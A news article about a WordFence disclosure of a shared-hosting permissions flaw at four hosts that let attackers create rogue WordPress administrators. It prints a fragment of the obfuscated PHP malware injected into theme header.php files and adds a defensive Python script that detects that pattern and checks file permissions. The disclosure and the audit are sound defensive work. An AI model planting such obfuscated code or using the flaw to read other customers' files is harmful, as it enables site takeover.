WordFence announced that they had discovered a vulnerability at four hosting companies. WordFence warns that while the vulnerability was patched, it’s possible sites were hacked prior to the fix.
Server settings allowed hackers to create WordPress administrator accounts from which the sites could be exploited with rogue code added to the WordPress theme.
WordFence urged site administrators to check their sites for rogue administrator accounts if they are hosted on iPage, FatCow, PowWeb, or NetFirm. All four are owned by the same company, Endurance International Group.
What Was the Server Vulnerability?
The affected servers had permission and file settings that allowed an attacker to view sensitive files. Other weaknesses then allowed the attackers to access the database, add themselves as administrators, and take over the site.
This is how WordFence described the vulnerability:
“Four conditions existed that contributed to this vulnerability:
1. Customer files are all stored on a shared file system.
2. The full path to a user’s web root directory was public or could be guessed.
3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).
4. An attacker could cause a program running in the group www to read files in arbitrary locations.”
Sites Could be Infected
WordFence warned that there was a period of time before the vulnerability was fixed during which sites hosted on these four host providers could have been infected.
It is recommended that site owners check their user lists to make sure there are no unauthorized administrators. If your site was affected, there should also be rogue code added to the theme.
Here is how WordFence described the rogue code:
“If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:
<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["dd\x70\x68z\x67\x64gx"]="sl\x77k\x77i";${"\x47\x4cO\x42\x41L\x53"}["c\x7a\x66\x6dubkdo\x6a\x78"]="\x6c\x6f\x63\x61t\x69\x6fn";${"\x47\x4c\x4fB\x41LS"}["\x67\x64\x64e\x74\x62p\x75f\x65i"]="\x68t\x6d\x6c";${"\x47\x4cOB\x41\x4cS"}["\x77i\x64\x68\x6bv\x6da"]="\x73t\x72\x66";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66s\x75\x71\x79\x6evw"]="b\x6f\x74";${"\x47\x4cOBAL\x53"}["w\x6c\x79\x63\x61\x76\x62\x71\x68\x6f\x6c\x75"]="cac\x68\x65";${"G\x4cO\x42\x41L\x53"}["ry\x68\x72ku\x6b"]="\x73\x63h\x65\x6d\x65";${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x6a\x6bc\x64e\x65\x69w"]="\x73l\x77k\x77i\x32";${"G\x4cOBA\x4cS"}["\x79\x65\x64\x73\x67\x6ah\x69\x73\x67"]="\x73\x6c\x74l\x65\x69l\x73";”
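As an added example (not WordFence's or the hosting companies' own tooling), the Python audit below checks the two things this article asks site owners to look at: whether the directory chain to a site's web root is group- or world-traversable while a sensitive file is group- or world-readable (WordFence's condition 3, taking wp-config.php as the sensitive file, which is an assumption), and whether any theme header.php contains the hex-escaped `${"…"}` spelling of `$GLOBALS` seen in the injected code. The web-root path and the `stop` boundary for the ancestor walk are supplied by the caller; a standard WordPress layout is assumed.

```python
import os
import re
import stat

# Condition 3, directory half: execute bit set for group or for all users.
TRAVERSE_MASK = stat.S_IXGRP | stat.S_IXOTH
# Condition 3, file half: read bit set for group or for all users.
READ_MASK = stat.S_IRGRP | stat.S_IROTH
# Injected form ${"\x47\x4c\x4f\x42\x41\x4c\x53"}[...]: a hex-escaped name that decodes to GLOBALS.
BRACED_STRING = re.compile(r'\$\{"((?:\\x[0-9a-fA-F]{2}|[A-Za-z])+)"\}\[')
PHP_HEX = re.compile(r'\\x([0-9a-fA-F]{2})')


def chain_traversable(web_root: str, stop: str = os.sep) -> bool:
    """True if every directory from `stop` (exclusive) down to `web_root` is
    group- or world-traversable, so another customer's process could walk it."""
    d, stop = os.path.abspath(web_root), os.path.abspath(stop)
    while d != stop:
        if not (os.stat(d).st_mode & TRAVERSE_MASK):
            return False
        parent = os.path.dirname(d)
        if parent == d:  # reached the filesystem root without meeting `stop`
            break
        d = parent
    return True

def decode_php_hex(s: str) -> str:
    """Expand PHP double-quoted \\xHH escapes; other characters pass through."""
    return PHP_HEX.sub(lambda m: chr(int(m.group(1), 16)), s)

def obfuscated_globals_hits(php_source: str) -> int:
    """Count ${"..."}[ constructs whose braced name decodes to GLOBALS."""
    return sum(1 for m in BRACED_STRING.finditer(php_source)
               if decode_php_hex(m.group(1)) == "GLOBALS")

def audit_site(web_root: str, stop: str = os.sep) -> dict:
    """Assumed layout: wp-config.php in the web root, themes under wp-content/themes."""
    config = os.path.join(web_root, "wp-config.php")
    findings = {
        "path_traversable": chain_traversable(web_root, stop),
        "config_readable": os.path.isfile(config) and bool(os.stat(config).st_mode & READ_MASK),
        "header_obfuscation_hits": 0,
    }
    for dirpath, _, files in os.walk(os.path.join(web_root, "wp-content", "themes")):
        if "header.php" in files:
            with open(os.path.join(dirpath, "header.php"), errors="replace") as fh:
                findings["header_obfuscation_hits"] += obfuscated_globals_hits(fh.read())
    # The exploitable combination is a reachable path AND readable secrets.
    findings["config_exposed"] = findings["path_traversable"] and findings["config_readable"]
    return findings
```

A clean result is not proof of a clean site: a rogue administrator account is only visible in the WordPress user list, and the attackers' code need not match this exact pattern.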
Vulnerability Has Been Fixed
WordFence disclosed the vulnerability to the hosting companies before making a public announcement. The hosting companies promptly fixed the vulnerabilities.
Nevertheless, following the guidance offered by WordFence, you may wish to check your user lists for rogue admin-level accounts and review your header.php file for rogue code.
Read the entire announcement at the WordFence blog
Images by Shutterstock, Modified by Author